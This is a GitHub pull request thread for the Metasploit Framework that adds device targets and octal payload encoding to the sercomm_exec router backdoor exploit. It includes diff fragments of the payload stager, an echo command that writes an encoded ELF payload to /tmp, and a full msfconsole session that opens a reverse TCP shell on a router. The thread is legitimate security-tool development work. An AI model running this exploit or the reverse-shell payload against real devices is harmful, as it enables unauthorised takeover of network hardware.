Sercomm Exploit module fixes #2874

Merged
merged 1 commit into from Jan 16, 2014

Projects

None yet

4 participants

@mandreko
Contributor
  • Added targets for 8 specific targets that I've tested: Cisco WAP4410N,
    Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear
    DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834
  • Added functionality to the CmdStagerEcho mix-in to support encoding via
    octal instead of hex based on the :enc_type option. This is because many
    devices would not output hex encoded values properly.
  • Added options on a per-target basis for the PackFormat (endian pack()
    values for communication), UploadPath (because /tmp wasn't always
    writable), and PayloadEncode (previously mentioned octal encoding
    option)
  • Note: For some reason, some devices communicate over one endianness, but
    then require a payload for the other endianess. I'm not sure what's
    causing this, but if those specific combinations are not used, the
    exploit fails. More research may be required for this.
@jvazquez-r7
Contributor

Processing it!

@jvazquez-r7 jvazquez-r7 and 2 others commented on an outdated diff Jan 14, 2014
lib/rex/exploitation/cmdstager/echo.rb
@@ -96,9 +104,16 @@ def slice_up_payload(encoded, opts)
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# cut the end of the part until we reach the start
- # of a full byte representation "\\xYZ"
- while (temp.length > 0 && temp[-5, 3] != "\\\\x")
- temp.chop!
+ # of a full byte representation "\\xYZ" or "\\YZ"
+ case opts[:enc_format]
+ when 'octal'
+ while (temp.length > 0 && temp[-4, 2] != "\\\\")
@jvazquez-r7
jvazquez-r7 Jan 14, 2014 Contributor

This is a bad assumption, the length codification of a byte on the octal outputed by Rex::Text.to_octal(@exe, "\\\\") isn't always 4. It isn't constant I mean, look at it:

[*] echo -en \\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\55\\1\\0\\0\\6\\2\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\331\\350\\331\\164\\44\\364\\135\\273\\323\\333\\137\\1\\51\\311\\261\\60\\61\\135\\31\\203\\355\\374\\3\\135\\25\\61\\56\\65\\3\\355\\34\\112\\206\\315\\353\\115\\270\\15\\243\\123\\167\\15\\365\\23>>/tmp/sNfSV

So the stager will fail randomly when the length is not enough to store full payload in just one command, and need to slice it.

@jvazquez-r7
jvazquez-r7 Jan 14, 2014 Contributor

On the other side, there is aslo Exploit::CmdStagerPrintf who isn't using echo, but the printf command. It supports octal representation. So I recommend:

  • switch to Exploit::CmdStagerPrintf if it works smoothly with the set of targets you've already available
  • If Exploit::CmdStagerPrintf isn't good enough here, use the same way than Exploit::CmdStagerPrintf to cut the end of a part when slicing the payload :)
@mandreko
mandreko Jan 14, 2014 Contributor

Gotcha. I'll have to fix the slicing of the payload. The CmdStagerPrintf doesn't seem to work, as a lot of the busybox installs don't have printf, or when they do, it writes a 0 byte payload.

I'll fix CmdStagerEcho ;)

@jvazquez-r7
jvazquez-r7 Jan 14, 2014 Contributor

coolio ! :)

@jvennix-r7
jvennix-r7 Jan 15, 2014 Contributor

This makes me wonder... Maybe some strange versions of echo expect that the hex string collapses the zeroes, "\x1" instead of "\x01"? Crazy, but maybe explains the failures you were seeing.

You could replace the Rex::Text.to_hex(...) call with @exe.bytes.map { |b| sprintf("\\\\x%x", b) }.join to test

@mandreko
mandreko Jan 16, 2014 Contributor

i was manually testing, and even \x41 wasn't working :(

@jvazquez-r7
Contributor

Processing, trying to help with the CmdStagerEcho changes! :)

@jvazquez-r7 jvazquez-r7 referenced this pull request in mandreko/metasploit-framework Jan 16, 2014
Merged

Clean CmdStagerEcho and Add module targets #4

@jvazquez-r7
Contributor

Hi @mandreko,

mandreko#4 request tries to clean this pull request by:

  • Cleaning the CmdStagerEcho, and now hopefully it's compatible with all the sercomm module requirements
  • Modifying the sercomm_exec module to add the Netgear N150 target
  • Modifying the sercomm_exec module to add manual targets, where the user can configure the exploitation with advanced options:
          OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
          OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
          OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
          OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),

Please feel free to check, review, discuss and land once you're comfortable and verify it's not breaking nothing and all your targets are working smoothly still! :) Thanks a lot!

@mandreko mandreko Merge pull request #4 from jvazquez-r7/review_2874
Clean CmdStagerEcho and Add module targets
f6f2da0
@jvazquez-r7
Contributor

Module working here:

msf > use exploit/linux/misc/sercomm_exec 
msf exploit(sercomm_exec) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf exploit(sercomm_exec) > set payload linux/mipsbe/shell_reverse_tcp 
payload => linux/mipsbe/shell_reverse_tcp
msf exploit(sercomm_exec) > set lhost 192.168.0.3
lhost => 192.168.0.3
msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.0.1      yes       The target address
   RPORT  32764            yes       The target port


Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.3      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian


msf exploit(sercomm_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic Linux MIPS Big Endian
   1   Generic Linux MIPS Little Endian
   2   Manual Linux MIPS Big Endian
   3   Manual Linux MIPS Little Endian
   4   Cisco WAP4410N
   5   Honeywell WAP-PL2 IP Camera
   6   Netgear DG834
   7   Netgear DG834G
   8   Netgear DG834PN
   9   Netgear DGN1000
   10  Netgear DSG835
   11  Netgear WPNT834


msf exploit(sercomm_exec) > set target 9
target => 9
msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 192.168.0.3:4444 
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.1:39448) at 2014-01-16 16:13:11 -0600
[*] Command Stager progress - 100.00% done (1411/1411 bytes)

pwd
/
ld
//bin/sh: ld: not found
ls
www.eng
www
wlan
var
usr
tmp
sys
sbin
proc
modemhwe.bin
lib
k2img
home
etc
dev
bin

Just giving time to travis to finish his test and landing! thanks @mandreko !!!

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 16, 2014
@jvazquez-r7 jvazquez-r7 Land #2874, @mandreko's sercomm exploit fixes ac9e634
@jvazquez-r7 jvazquez-r7 merged commit f6f2da0 into rapid7:master Jan 16, 2014

1 check passed

default The Travis CI build passed
Details
@hsqrealm
hsqrealm commented Oct 6, 2015

[] Started reverse handler on ***********
[
] Command Stager progress - 100.00% done (1164/1164 bytes)
msf exploit(sercomm_exec) >

Netgear DG834G is the router im trying to send the exploit

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment